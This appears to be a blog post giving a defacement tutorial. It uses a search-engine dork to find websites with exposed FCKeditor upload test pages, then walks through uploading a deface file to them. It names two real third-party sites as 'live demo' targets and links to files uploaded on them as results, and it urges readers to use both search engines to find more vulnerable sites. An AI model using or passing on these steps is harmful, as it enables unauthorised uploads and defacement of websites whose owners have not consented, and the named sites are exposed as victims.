Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Category Of Vulnreability : Remote Upload
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Steps that you need to do.
Go to Google.com or Bing.com and type this Dork : intitle:"FCKeditor - Uploaders Tests"
(use both search engines for getting more vulnerable websites)
now you'll Got FCK editor upload option, and you can get Upload option by going to this URL
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
Now change Select the "File Uploader" to use into PHP
Then Select your .txt deface and click on send it to the server (some websites allowed you to upload .html and .jpg files)
if your file successfully uploaded, you will got "File uploaded with no errors" Alert
to View your file see Uploaded File URL
or go to:
http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
Live Demo :
http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result :
http://www.relationshiptrends.com/affiliate/img/ck.txt
http://minisite.nku.edu.tr//userfiles/ck.txt
Next time i will post many such tutorial stay updated stay connected :).
I researched about the file upload for more information you may click here
ReplyDelete